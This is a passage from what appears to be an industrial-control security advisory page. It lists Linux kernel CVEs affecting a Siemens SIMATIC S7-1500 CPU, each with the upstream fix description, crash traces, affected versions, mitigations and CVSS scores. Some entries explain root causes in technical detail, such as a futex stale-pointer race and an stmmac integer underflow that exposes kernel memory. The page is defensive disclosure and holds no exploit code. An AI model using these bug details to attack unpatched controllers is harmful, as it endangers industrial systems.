<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/763.html">CWE-763 Release of Invalid Pointer or Reference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31546</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: bonding: fix NULL deref in bond_debug_rlb_hash_show rlb_clear_slave intentionally keeps RLB hash-table entries on the rx_hashtbl_used_head list with slave set to NULL when no replacement slave is available. However, bond_debug_rlb_hash_show visites client_info-&gt;slave without checking if it's NULL. Other used-list iterators in bond_alb.c already handle this NULL-slave state safely: - rlb_update_client returns early on !client_info-&gt;slave - rlb_req_update_slave_clients, rlb_clear_slave, and rlb_rebalance compare slave values before visiting - lb_req_update_subnet_clients continues if slave is NULL The following NULL deref crash can be trigger in bond_debug_rlb_hash_show: [ 1.289791] BUG: kernel NULL pointer dereference, address: 0000000000000000 [ 1.292058] RIP: 0010:bond_debug_rlb_hash_show (drivers/net/bonding/bond_debugfs.c:41) [ 1.293101] RSP: 0018:ffffc900004a7d00 EFLAGS: 00010286 [ 1.293333] RAX: 0000000000000000 RBX: ffff888102b48200 RCX: ffff888102b48204 [ 1.293631] RDX: ffff888102b48200 RSI: ffffffff839daad5 RDI: ffff888102815078 [ 1.293924] RBP: ffff888102815078 R08: ffff888102b4820e R09: 0000000000000000 [ 1.294267] R10: 0000000000000000 R11: 0000000000000000 R12: ffff888100f929c0 [ 1.294564] R13: ffff888100f92a00 R14: 0000000000000001 R15: ffffc900004a7ed8 [ 1.294864] FS: 0000000001395380(0000) GS:ffff888196e75000(0000) knlGS:0000000000000000 [ 1.295239] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 1.295480] CR2: 0000000000000000 CR3: 0000000102adc004 CR4: 0000000000772ef0 [ 1.295897] Call Trace: [ 1.296134] seq_read_iter (fs/seq_file.c:231) [ 1.296341] seq_read (fs/seq_file.c:164) [ 1.296493] full_proxy_read (fs/debugfs/file.c:378 (discriminator 1)) [ 1.296658] vfs_read (fs/read_write.c:572) [ 1.296981] ksys_read (fs/read_write.c:717) [ 1.297132] do_syscall_64 (arch/x86/entry/syscall_64.c:63 (discriminator 1) arch/x86/entry/syscall_64.c:94 (discriminator 1)) [ 1.297325] entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130) Add a NULL check and print "(none)" for entries with no assigned slave.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31546">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31555</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: futex: Clear stale exiting pointer in futex_lock_pi() retry path Fuzzying/stressing futexes triggered: WARNING: kernel/futex/core.c:825 at wait_for_owner_exiting+0x7a/0x80, CPU#11: futex_lock_pi_s/524 When futex_lock_pi_atomic() sees the owner is exiting, it returns -EBUSY and stores a refcounted task pointer in 'exiting'. After wait_for_owner_exiting() consumes that reference, the local pointer is never reset to nil. Upon a retry, if futex_lock_pi_atomic() returns a different error, the bogus pointer is passed to wait_for_owner_exiting(). CPU0 CPU1 CPU2 futex_lock_pi(uaddr) // acquires the PI futex exit() futex_cleanup_begin() futex_state = EXITING; futex_lock_pi(uaddr) futex_lock_pi_atomic() attach_to_pi_owner() // observes EXITING *exiting = owner; // takes ref return -EBUSY wait_for_owner_exiting(-EBUSY, owner) put_task_struct(); // drops ref // exiting still points to owner goto retry; futex_lock_pi_atomic() lock_pi_update_atomic() cmpxchg(uaddr) *uaddr ^= WAITERS // whatever // value changed return -EAGAIN; wait_for_owner_exiting(-EAGAIN, exiting) // stale WARN_ON_ONCE(exiting) Fix this by resetting upon retry, essentially aligning it with requeue_pi.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31555">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31563</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: macb: Use dev_consume_skb_any() to free TX SKBs The napi_consume_skb() function is not intended to be called in an IRQ disabled context. However, after commit 6bc8a5098bf4 ("net: macb: Fix tx_ptr_lock locking"), the freeing of TX SKBs is performed with IRQs disabled. To resolve the following call trace, use dev_consume_skb_any() for freeing TX SKBs: WARNING: kernel/softirq.c:430 at __local_bh_enable_ip+0x174/0x188, CPU#0: ksoftirqd/0/15 Modules linked in: CPU: 0 UID: 0 PID: 15 Comm: ksoftirqd/0 Not tainted 7.0.0-rc4-next-20260319-yocto-standard-dirty #37 PREEMPT Hardware name: ZynqMP ZCU102 Rev1.1 (DT) pstate: 200000c5 (nzCv daIF -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : __local_bh_enable_ip+0x174/0x188 lr : local_bh_enable+0x24/0x38 sp : ffff800082b3bb10 x29: ffff800082b3bb10 x28: ffff0008031f3c00 x27: 000000000011ede0 x26: ffff000800a7ff00 x25: ffff800083937ce8 x24: 0000000000017a80 x23: ffff000803243a78 x22: 0000000000000040 x21: 0000000000000000 x20: ffff000800394c80 x19: 0000000000000200 x18: 0000000000000001 x17: 0000000000000001 x16: ffff000803240000 x15: 0000000000000000 x14: ffffffffffffffff x13: 0000000000000028 x12: ffff000800395650 x11: ffff8000821d1528 x10: ffff800081c2bc08 x9 : ffff800081c1e258 x8 : 0000000100000301 x7 : ffff8000810426ec x6 : 0000000000000000 x5 : 0000000000000001 x4 : 0000000000000001 x3 : 0000000000000000 x2 : 0000000000000008 x1 : 0000000000000200 x0 : ffff8000810428dc Call trace: __local_bh_enable_ip+0x174/0x188 (P) local_bh_enable+0x24/0x38 skb_attempt_defer_free+0x190/0x1d8 napi_consume_skb+0x58/0x108 macb_tx_poll+0x1a4/0x558 __napi_poll+0x50/0x198 net_rx_action+0x1f4/0x3d8 handle_softirqs+0x16c/0x560 run_ksoftirqd+0x44/0x80 smpboot_thread_fn+0x1d8/0x338 kthread+0x120/0x150 ret_from_fork+0x10/0x20 irq event stamp: 29751 hardirqs last enabled at (29750): [] _raw_spin_unlock_irqrestore+0x44/0x88 hardirqs last disabled at (29751): [] _raw_spin_lock_irqsave+0x38/0x98 softirqs last enabled at (29150): [] handle_softirqs+0x504/0x560 softirqs last disabled at (29153): [] run_ksoftirqd+0x44/0x80</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31563">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31565</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: RDMA/irdma: Fix deadlock during netdev reset with active connections Resolve deadlock that occurs when user executes netdev reset while RDMA applications (e.g., rping) are active. The netdev reset causes ice driver to remove irdma auxiliary driver, triggering device_delete and subsequent client removal. During client removal, uverbs_client waits for QP reference count to reach zero while cma_client holds the final reference, creating circular dependency and indefinite wait in iWARP mode. Skip QP reference count wait during device reset to prevent deadlock.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31565">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31628</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: x86/CPU: Fix FPDSS on Zen1 Zen1's hardware divider can leave, under certain circumstances, partial results from previous operations. Those results can be leaked by another, attacker thread. Fix that with a chicken bit.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31628">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31634</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: rxrpc: fix reference count leak in rxrpc_server_keyring() This patch fixes a reference count leak in rxrpc_server_keyring() by checking if rx-&gt;securities is already set.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31634">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31649</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: stmmac: fix integer underflow in chain mode The jumbo_frm() chain-mode implementation unconditionally computes len = nopaged_len - bmax; where nopaged_len = skb_headlen(skb) (linear bytes only) and bmax is BUF_SIZE_8KiB or BUF_SIZE_2KiB. However, the caller stmmac_xmit() decides to invoke jumbo_frm() based on skb-&gt;len (total length including page fragments): is_jumbo = stmmac_is_jumbo_frm(priv, skb-&gt;len, enh_desc); When a packet has a small linear portion (nopaged_len &lt;= bmax) but a large total length due to page fragments (skb-&gt;len &gt; bmax), the subtraction wraps as an unsigned integer, producing a huge len value (~0xFFFFxxxx). This causes the while (len != 0) loop to execute hundreds of thousands of iterations, passing skb-&gt;data + bmax * i pointers far beyond the skb buffer to dma_map_single(). On IOMMU-less SoCs (the typical deployment for stmmac), this maps arbitrary kernel memory to the DMA engine, constituting a kernel memory disclosure and potential memory corruption from hardware. Fix this by introducing a buf_len local variable clamped to min(nopaged_len, bmax). Computing len = nopaged_len - buf_len is then always safe: it is zero when the linear portion fits within a single descriptor, causing the while (len != 0) loop to be skipped naturally, and the fragment loop in stmmac_xmit() handles page fragments afterward.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31649">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31651</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mmc: vub300: fix NULL-deref on disconnect Make sure to deregister the controller before dropping the reference to the driver data on disconnect to avoid NULL-pointer dereferences or use-after-free.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31651">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31658</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: altera-tse: fix skb leak on DMA mapping error in tse_start_xmit() When dma_map_single() fails in tse_start_xmit(), the function returns NETDEV_TX_OK without freeing the skb. Since NETDEV_TX_OK tells the stack the packet was consumed, the skb is never freed, leaking memory on every DMA mapping failure. Add dev_kfree_skb_any() before returning to properly free the skb.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31658">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
